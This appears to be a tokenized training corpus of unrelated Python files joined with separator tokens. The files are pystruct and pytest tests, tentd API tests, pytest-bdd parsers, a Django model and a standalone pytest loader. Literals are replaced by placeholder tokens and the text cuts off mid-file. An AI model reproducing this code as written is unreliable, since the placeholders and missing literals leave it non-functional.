csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> assert_true ( is_forest ( tree_edges , <NUM_LIT:10> ) ) <EOL> assert_true ( is_forest ( tree_edges ) ) <EOL> except ImportError : <EOL> pass <EOL> def test_tree_max_product_chain ( ) : <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> forward = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> backward = np . c_ [ np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) , np . arange ( <NUM_LIT:9> ) ] <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> for chain in [ forward , backward ] : <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> chain , branch_and_bound = True ) <EOL> result_mp = inference_max_product ( unary_potentials , <EOL> pairwise_potentials , chain ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_tree_max_product_tree ( ) : <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> graph = rnd . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> tree = minimum_spanning_tree ( sparse . csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . 
normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> tree_edges , branch_and_bound = True ) <EOL> result_mp = inference_max_product ( unary_potentials , <EOL> pairwise_potentials , tree_edges ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_iterative_max_product_chain ( ) : <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> chain = np . c_ [ np . arange ( <NUM_LIT:9> ) , np . arange ( <NUM_LIT:1> , <NUM_LIT:10> ) ] <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> chain , branch_and_bound = True ) <EOL> result_mp = iterative_max_product ( unary_potentials , <EOL> pairwise_potentials , chain ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_iterative_max_product_tree ( ) : <EOL> try : <EOL> from scipy . sparse . csgraph import minimum_spanning_tree <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> rnd = np . random . RandomState ( <NUM_LIT:0> ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> graph = rnd . uniform ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> tree = minimum_spanning_tree ( sparse . csr_matrix ( graph ) ) <EOL> tree_edges = np . c_ [ tree . nonzero ( ) ] <EOL> unary_potentials = rnd . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:3> ) ) <EOL> pairwise_potentials = rnd . 
normal ( size = ( <NUM_LIT:9> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> result_ad3 = inference_ad3 ( unary_potentials , pairwise_potentials , <EOL> tree_edges , branch_and_bound = True ) <EOL> result_mp = iterative_max_product ( unary_potentials , <EOL> pairwise_potentials , tree_edges ) <EOL> assert_array_equal ( result_ad3 , result_mp ) <EOL> def test_max_product_binary_blocks ( ) : <EOL> X , Y = generate_blocks ( n_samples = <NUM_LIT:1> ) <EOL> x , y = X [ <NUM_LIT:0> ] , Y [ <NUM_LIT:0> ] <EOL> w = np . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT:1> , <EOL> <NUM_LIT:0> , <EOL> - <NUM_LIT:4> , <NUM_LIT:0> ] ) <EOL> crf = GridCRF ( inference_method = '<STR_LIT>' ) <EOL> crf . initialize ( X , Y ) <EOL> y_hat = crf . inference ( x , w ) <EOL> assert_array_equal ( y , y_hat ) <EOL> def test_max_product_multinomial_crf ( ) : <EOL> X , Y = generate_blocks_multinomial ( n_samples = <NUM_LIT:1> ) <EOL> x , y = X [ <NUM_LIT:0> ] , Y [ <NUM_LIT:0> ] <EOL> w = np . array ( [ <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <EOL> <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <EOL> <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] ) <EOL> crf = GridCRF ( inference_method = '<STR_LIT>' ) <EOL> crf . initialize ( X , Y ) <EOL> y_hat = crf . inference ( x , w ) <EOL> assert_array_equal ( y , y_hat ) </s>
<s> import numpy as np <EOL> def is_forest ( edges , n_vertices = None ) : <EOL> if n_vertices is not None and len ( edges ) > n_vertices - <NUM_LIT:1> : <EOL> return False <EOL> n_vertices = np . max ( edges ) + <NUM_LIT:1> <EOL> parents = - np . ones ( n_vertices ) <EOL> visited = np . zeros ( n_vertices , dtype = np . bool ) <EOL> neighbors = [ [ ] for i in range ( n_vertices ) ] <EOL> for edge in edges : <EOL> neighbors [ edge [ <NUM_LIT:0> ] ] . append ( edge [ <NUM_LIT:1> ] ) <EOL> neighbors [ edge [ <NUM_LIT:1> ] ] . append ( edge [ <NUM_LIT:0> ] ) <EOL> lonely = <NUM_LIT:0> <EOL> while lonely < n_vertices : <EOL> for i in range ( lonely , n_vertices ) : <EOL> if not visited [ i ] : <EOL> queue = [ i ] <EOL> lonely = i + <NUM_LIT:1> <EOL> visited [ i ] = True <EOL> break <EOL> lonely = n_vertices <EOL> while queue : <EOL> node = queue . pop ( ) <EOL> for neighbor in neighbors [ node ] : <EOL> if not visited [ neighbor ] : <EOL> parents [ neighbor ] = node <EOL> queue . append ( neighbor ) <EOL> visited [ neighbor ] = True <EOL> elif not parents [ node ] == neighbor : <EOL> return False <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> import requests <EOL> from flask import json <EOL> from py . test import raises , fixture <EOL> from tentd . documents . entity import Follower <EOL> from tentd . tests . http import POST , SPUT , SDELETE <EOL> from tentd . tests . mock import MockFunction , MockResponse <EOL> from tentd . utils . exceptions import APIBadRequest <EOL> PROFILE_FORMAT = '<STR_LIT>' <EOL> @ fixture <EOL> def follower_mocks ( request , monkeypatch ) : <EOL> follower_identity = '<STR_LIT>' <EOL> follower_api_root = '<STR_LIT>' <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , MockFunction ( ) ) <EOL> requests . head [ follower_identity ] = MockResponse ( <EOL> headers = { '<STR_LIT>' : PROFILE_FORMAT . format ( follower_api_root ) } ) <EOL> monkeypatch . setattr ( requests , '<STR_LIT>' , MockFunction ( ) ) <EOL> requests . get [ follower_api_root + '<STR_LIT>' ] = MockResponse ( ) <EOL> requests . get [ follower_api_root + '<STR_LIT>' ] = MockResponse ( <EOL> json = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : follower_identity , <EOL> "<STR_LIT>" : [ follower_api_root ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } } ) <EOL> assert isinstance ( requests . head , MockFunction ) <EOL> assert isinstance ( requests . get , MockFunction ) <EOL> @ request . addfinalizer <EOL> def teardown_mocks ( ) : <EOL> monkeypatch . delattr ( requests , '<STR_LIT>' ) <EOL> monkeypatch . delattr ( requests , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : follower_identity , <EOL> '<STR_LIT>' : follower_api_root , <EOL> '<STR_LIT>' : follower_api_root + '<STR_LIT>' <EOL> } <EOL> @ fixture <EOL> def new_follower_mocks ( request , follower_mocks ) : <EOL> new_follower_identity = '<STR_LIT>' <EOL> new_follower_api_root = '<STR_LIT>' <EOL> requests . head [ new_follower_identity ] = MockResponse ( <EOL> headers = { '<STR_LIT>' : PROFILE_FORMAT . format ( new_follower_api_root ) } ) <EOL> requests . 
get [ new_follower_api_root + '<STR_LIT>' ] = MockResponse ( ) <EOL> requests . get [ new_follower_api_root + '<STR_LIT>' ] = MockResponse ( <EOL> json = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : [ '<STR_LIT>' ] , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } } ) <EOL> follower_mocks . update ( { <EOL> '<STR_LIT>' : new_follower_identity , <EOL> '<STR_LIT>' : new_follower_api_root , <EOL> } ) <EOL> return follower_mocks <EOL> def test_create_follower ( entity , follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> response = POST ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : follower_mocks [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT:all>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> Follower . objects . get ( id = response . json ( ) [ '<STR_LIT:id>' ] ) <EOL> assert requests . get . was_called ( follower_mocks [ '<STR_LIT>' ] ) <EOL> def test_create_invalid_follower ( entity , follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> with raises ( APIBadRequest ) : <EOL> POST ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert requests . get . was_not_called ( follower_mocks [ '<STR_LIT>' ] ) <EOL> def test_update_follower ( entity , follower , new_follower_mocks ) : <EOL> """<STR_LIT>""" <EOL> response = SPUT ( '<STR_LIT>' , follower_id = follower . id , data = { <EOL> '<STR_LIT>' : new_follower_mocks [ '<STR_LIT>' ] } ) <EOL> updated_follower = Follower . objects . get ( id = follower . id ) <EOL> assert str ( follower . id ) == response . json ( ) [ '<STR_LIT:id>' ] <EOL> assert new_follower_mocks [ '<STR_LIT>' ] == response . json ( ) [ '<STR_LIT>' ] <EOL> assert new_follower_mocks [ '<STR_LIT>' ] == updated_follower . identity <EOL> def test_delete_follower ( follower ) : <EOL> SDELETE ( '<STR_LIT>' , follower_id = follower . id ) <EOL> assert Follower . objects . 
count ( ) == <NUM_LIT:0> <EOL> def test_delete_missing_follower ( entity ) : <EOL> """<STR_LIT>""" <EOL> with raises ( APIBadRequest ) : <EOL> SDELETE ( '<STR_LIT>' , follower_id = <NUM_LIT:0> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import re as base_re <EOL> import warnings <EOL> import parse as base_parse <EOL> from parse_type import cfparse as base_cfparse <EOL> import six <EOL> from . exceptions import InvalidStepParserError <EOL> RE_TYPE = type ( base_re . compile ( '<STR_LIT>' ) ) <EOL> class StepParser ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> class re ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( re , self ) . __init__ ( name ) <EOL> self . regex = base_re . compile ( self . name , * args , ** kwargs ) <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . regex . match ( name ) . groupdict ( ) <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return bool ( self . regex . match ( name ) ) <EOL> class parse ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( parse , self ) . __init__ ( name ) <EOL> self . parser = base_parse . compile ( self . name , * args , ** kwargs ) <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . parser . parse ( name ) . named <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return bool ( self . parser . parse ( name ) ) <EOL> except ValueError : <EOL> return False <EOL> class cfparse ( parse ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( parse , self ) . __init__ ( name ) <EOL> self . parser = base_cfparse . Parser ( self . 
name , * args , ** kwargs ) <EOL> class string ( StepParser ) : <EOL> """<STR_LIT>""" <EOL> def parse_arguments ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def is_matching ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return self . name == name <EOL> def get_parser ( step_name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( step_name , RE_TYPE ) : <EOL> warn = ( <EOL> '<STR_LIT>' . format ( <EOL> step_name . pattern ) <EOL> ) <EOL> warnings . warn ( warn ) <EOL> print ( warn ) <EOL> return re ( step_name . pattern , flags = step_name . flags ) <EOL> elif isinstance ( step_name , six . string_types ) : <EOL> return string ( step_name ) <EOL> elif not hasattr ( step_name , '<STR_LIT>' ) or not hasattr ( step_name , '<STR_LIT>' ) : <EOL> raise InvalidStepParserError ( step_name ) <EOL> else : <EOL> return step_name </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> import re <EOL> import six <EOL> from pytest_bdd import ( <EOL> scenario , <EOL> given , <EOL> then , <EOL> parsers , <EOL> exceptions , <EOL> ) <EOL> def test_scenario_not_found ( request ) : <EOL> """<STR_LIT>""" <EOL> with pytest . raises ( exceptions . ScenarioNotFound ) as exc_info : <EOL> scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> assert six . text_type ( exc_info . value ) . startswith ( <EOL> '<STR_LIT>' <EOL> . format ( feature_path = request . fspath . join ( '<STR_LIT:..>' , '<STR_LIT>' ) ) ) <EOL> @ given ( '<STR_LIT>' ) <EOL> def comments ( ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ then ( parsers . parse ( '<STR_LIT>' ) ) <EOL> def a_comment ( acomment ) : <EOL> """<STR_LIT>""" <EOL> assert re . search ( '<STR_LIT>' , acomment ) <EOL> def test_scenario_comments ( request ) : <EOL> """<STR_LIT>""" <EOL> @ scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test ( ) : <EOL> pass <EOL> @ scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test2 ( ) : <EOL> pass <EOL> test ( request ) <EOL> test2 ( request ) <EOL> def test_scenario_not_decorator ( request ) : <EOL> """<STR_LIT>""" <EOL> func = scenario ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> with pytest . raises ( exceptions . ScenarioIsDecoratorOnly ) : <EOL> func ( request ) </s>
<s> from django . db import models <EOL> class Item ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def __str__ ( self ) : <EOL> return self . name </s>
<s> import types <EOL> def format_exception_only ( etype , value ) : <EOL> """<STR_LIT>""" <EOL> if ( isinstance ( etype , BaseException ) or <EOL> isinstance ( etype , types . InstanceType ) or <EOL> etype is None or type ( etype ) is str ) : <EOL> return [ _format_final_exc_line ( etype , value ) ] <EOL> stype = etype . __name__ <EOL> if not issubclass ( etype , SyntaxError ) : <EOL> return [ _format_final_exc_line ( stype , value ) ] <EOL> lines = [ ] <EOL> try : <EOL> msg , ( filename , lineno , offset , badline ) = value . args <EOL> except Exception : <EOL> pass <EOL> else : <EOL> filename = filename or "<STR_LIT>" <EOL> lines . append ( '<STR_LIT>' % ( filename , lineno ) ) <EOL> if badline is not None : <EOL> if isinstance ( badline , bytes ) : <EOL> badline = badline . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) <EOL> lines . append ( u'<STR_LIT>' % badline . strip ( ) ) <EOL> if offset is not None : <EOL> caretspace = badline . rstrip ( '<STR_LIT:\n>' ) [ : offset ] . lstrip ( ) <EOL> caretspace = ( ( c . isspace ( ) and c or '<STR_LIT:U+0020>' ) for c in caretspace ) <EOL> lines . append ( '<STR_LIT>' % '<STR_LIT>' . join ( caretspace ) ) <EOL> value = msg <EOL> lines . append ( _format_final_exc_line ( stype , value ) ) <EOL> return lines <EOL> def _format_final_exc_line ( etype , value ) : <EOL> """<STR_LIT>""" <EOL> valuestr = _some_str ( value ) <EOL> if value is None or not valuestr : <EOL> line = "<STR_LIT>" % etype <EOL> else : <EOL> line = "<STR_LIT>" % ( etype , valuestr ) <EOL> return line <EOL> def _some_str ( value ) : <EOL> try : <EOL> return unicode ( value ) <EOL> except Exception : <EOL> try : <EOL> return str ( value ) <EOL> except Exception : <EOL> pass <EOL> return '<STR_LIT>' % type ( value ) . __name__ </s>
<s> sources = """<STR_LIT>""" <EOL> import sys <EOL> import base64 <EOL> import zlib <EOL> class DictImporter ( object ) : <EOL> def __init__ ( self , sources ) : <EOL> self . sources = sources <EOL> def find_module ( self , fullname , path = None ) : <EOL> if fullname == "<STR_LIT>" and sys . version_info >= ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> return None <EOL> if fullname in self . sources : <EOL> return self <EOL> if fullname + '<STR_LIT>' in self . sources : <EOL> return self <EOL> return None <EOL> def load_module ( self , fullname ) : <EOL> from types import ModuleType <EOL> try : <EOL> s = self . sources [ fullname ] <EOL> is_pkg = False <EOL> except KeyError : <EOL> s = self . sources [ fullname + '<STR_LIT>' ] <EOL> is_pkg = True <EOL> co = compile ( s , fullname , '<STR_LIT>' ) <EOL> module = sys . modules . setdefault ( fullname , ModuleType ( fullname ) ) <EOL> module . __file__ = "<STR_LIT>" % ( __file__ , fullname ) <EOL> module . __loader__ = self <EOL> if is_pkg : <EOL> module . __path__ = [ fullname ] <EOL> do_exec ( co , module . __dict__ ) <EOL> return sys . modules [ fullname ] <EOL> def get_source ( self , name ) : <EOL> res = self . sources . get ( name ) <EOL> if res is None : <EOL> res = self . sources . get ( name + '<STR_LIT>' ) <EOL> return res <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> import pkg_resources <EOL> except ImportError : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> if sys . version_info >= ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> exec ( "<STR_LIT>" ) <EOL> import pickle <EOL> sources = sources . encode ( "<STR_LIT:ascii>" ) <EOL> sources = pickle . loads ( zlib . decompress ( base64 . decodebytes ( sources ) ) ) <EOL> else : <EOL> import cPickle as pickle <EOL> exec ( "<STR_LIT>" ) <EOL> sources = pickle . loads ( zlib . decompress ( base64 . decodestring ( sources ) ) ) <EOL> importer = DictImporter ( sources ) <EOL> sys . meta_path . 
insert ( <NUM_LIT:0> , importer ) <EOL> entry = "<STR_LIT>" <EOL> do_exec ( entry , locals ( ) ) </s>
<s> def test_function ( ) : <EOL> pass <EOL> class TestClass : <EOL> def test_method ( self ) : <EOL> pass <EOL> def test_anothermethod ( self ) : <EOL> pass </s>
<s> import pytest , py <EOL> from _pytest . main import Session , EXIT_NOTESTSCOLLECTED <EOL> class TestCollector : <EOL> def test_collect_versus_item ( self ) : <EOL> from pytest import Collector , Item <EOL> assert not issubclass ( Collector , Item ) <EOL> assert not issubclass ( Item , Collector ) <EOL> def test_compat_attributes ( self , testdir , recwarn ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> recwarn . clear ( ) <EOL> assert modcol . Module == pytest . Module <EOL> assert modcol . Class == pytest . Class <EOL> assert modcol . Item == pytest . Item <EOL> assert modcol . File == pytest . File <EOL> assert modcol . Function == pytest . Function <EOL> def test_check_equality ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> fn1 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn1 , pytest . Function ) <EOL> fn2 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn2 , pytest . Function ) <EOL> assert fn1 == fn2 <EOL> assert fn1 != modcol <EOL> if py . std . sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) : <EOL> assert cmp ( fn1 , fn2 ) == <NUM_LIT:0> <EOL> assert hash ( fn1 ) == hash ( fn2 ) <EOL> fn3 = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> assert isinstance ( fn3 , pytest . Function ) <EOL> assert not ( fn1 == fn3 ) <EOL> assert fn1 != fn3 <EOL> for fn in fn1 , fn2 , fn3 : <EOL> assert fn != <NUM_LIT:3> <EOL> assert fn != modcol <EOL> assert fn != [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> assert [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] != fn <EOL> assert modcol != fn <EOL> def test_getparent ( self , testdir ) : <EOL> modcol = testdir . getmodulecol ( """<STR_LIT>""" ) <EOL> cls = testdir . collect_by_name ( modcol , "<STR_LIT>" ) <EOL> fn = testdir . collect_by_name ( <EOL> testdir . collect_by_name ( cls , "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> parent = fn . getparent ( pytest . 
Module ) <EOL> assert parent is modcol <EOL> parent = fn . getparent ( pytest . Function ) <EOL> assert parent is fn <EOL> parent = fn . getparent ( pytest . Class ) <EOL> assert parent is cls <EOL> def test_getcustomfile_roundtrip ( self , testdir ) : <EOL> hello = testdir . makefile ( "<STR_LIT>" , hello = "<STR_LIT>" ) <EOL> testdir . makepyfile ( conftest = """<STR_LIT>""" ) <EOL> node = testdir . getpathnode ( hello ) <EOL> assert isinstance ( node , pytest . File ) <EOL> assert node . name == "<STR_LIT>" <EOL> nodes = node . session . perform_collect ( [ node . nodeid ] , genitems = False ) <EOL> assert len ( nodes ) == <NUM_LIT:1> <EOL> assert isinstance ( nodes [ <NUM_LIT:0> ] , pytest . File ) <EOL> class TestCollectFS : <EOL> def test_ignored_certain_directories ( self , testdir ) : <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> tmpdir . ensure ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> for x in tmpdir . visit ( "<STR_LIT>" ) : <EOL> x . write ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> s = result . stdout . str ( ) <EOL> assert "<STR_LIT>" not in s <EOL> assert "<STR_LIT>" in s <EOL> def test_custom_norecursedirs ( self , testdir ) : <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> rec = testdir . inline_run ( ) <EOL> rec . assertoutcome ( passed = <NUM_LIT:1> ) <EOL> rec = testdir . inline_run ( "<STR_LIT>" ) <EOL> rec . 
assertoutcome ( failed = <NUM_LIT:1> ) <EOL> def test_testpaths_ini ( self , testdir , monkeypatch ) : <EOL> testdir . makeini ( """<STR_LIT>""" ) <EOL> tmpdir = testdir . tmpdir <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> tmpdir . ensure ( "<STR_LIT>" , "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> items , reprec = testdir . inline_genitems ( '<STR_LIT>' ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> for dirname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> items , reprec = testdir . inline_genitems ( tmpdir . join ( dirname ) ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' % dirname ] <EOL> for dirname in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> monkeypatch . chdir ( testdir . tmpdir . join ( dirname ) ) <EOL> items , reprec = testdir . inline_genitems ( ) <EOL> assert [ x . name for x in items ] == [ '<STR_LIT>' % dirname ] <EOL> class TestCollectPluginHookRelay : <EOL> def test_pytest_collect_file ( self , testdir ) : <EOL> wascalled = [ ] <EOL> class Plugin : <EOL> def pytest_collect_file ( self , path , parent ) : <EOL> wascalled . append ( path ) <EOL> testdir . makefile ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pytest . main ( [ testdir . tmpdir ] , plugins = [ Plugin ( ) ] ) <EOL> assert len ( wascalled ) == <NUM_LIT:1> <EOL> assert wascalled [ <NUM_LIT:0> ] . ext == '<STR_LIT>' <EOL> def test_pytest_collect_directory ( self , testdir ) : <EOL> wascalled = [ ] <EOL> class Plugin : <EOL> def pytest_collect_directory ( self , path , parent ) : <EOL> wascalled . append ( path . basename ) <EOL> testdir . mkdir ( "<STR_LIT:hello>" ) <EOL> testdir . mkdir ( "<STR_LIT>" ) <EOL> pytest . main ( testdir . 
tmpdir , plugins = [ Plugin ( ) ] ) <EOL> assert "<STR_LIT:hello>" in wascalled <EOL> assert "<STR_LIT>" in wascalled <EOL> class TestPrunetraceback : <EOL> def test_collection_error ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> assert "<STR_LIT>" not in result . stdout . str ( ) , "<STR_LIT>" <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_custom_repr_failure ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> @ pytest . mark . xfail ( reason = "<STR_LIT>" ) <EOL> def test_collect_report_postprocessing ( self , testdir ) : <EOL> p = testdir . makepyfile ( """<STR_LIT>""" ) <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> result = testdir . runpytest ( p ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) <EOL> class TestCustomConftests : <EOL> def test_ignore_collect_path ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> sub = testdir . mkdir ( "<STR_LIT>" ) <EOL> sub . ensure ( "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> sub . join ( "<STR_LIT>" ) . write ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( test_one = "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( [ "<STR_LIT>" ] ) <EOL> def test_ignore_collect_not_called_on_argument ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> p = testdir . makepyfile ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( p ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> result . stdout . fnmatch_lines ( "<STR_LIT>" ) <EOL> result = testdir . 
runpytest ( ) <EOL> assert result . ret == EXIT_NOTESTSCOLLECTED <EOL> result . stdout . fnmatch_lines ( "<STR_LIT>" ) <EOL> def test_collectignore_exclude_on_option ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> testdir . mkdir ( "<STR_LIT:hello>" ) <EOL> testdir . makepyfile ( test_world = "<STR_LIT>" ) <EOL> result = testdir . runpytest ( ) <EOL> assert result . ret == EXIT_NOTESTSCOLLECTED <EOL> assert "<STR_LIT>" not in result . stdout . str ( ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> assert result . ret == <NUM_LIT:0> <EOL> assert "<STR_LIT>" in result . stdout . str ( ) <EOL> def test_pytest_fs_collect_hooks_are_seen ( self , testdir ) : <EOL> testdir . makeconftest ( """<STR_LIT>""" ) <EOL> testdir . mkdir ( "<STR_LIT>" ) <EOL> testdir . makepyfile ( "<STR_LIT>" ) <EOL> result = testdir . runpytest ( "<STR_LIT>" ) <EOL> result . stdout . fnmatch_lines ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> def test_pytest_collect_file_from_sister_dir ( self , testdir ) : <EOL> sub1 = testdir . mkpydir ( 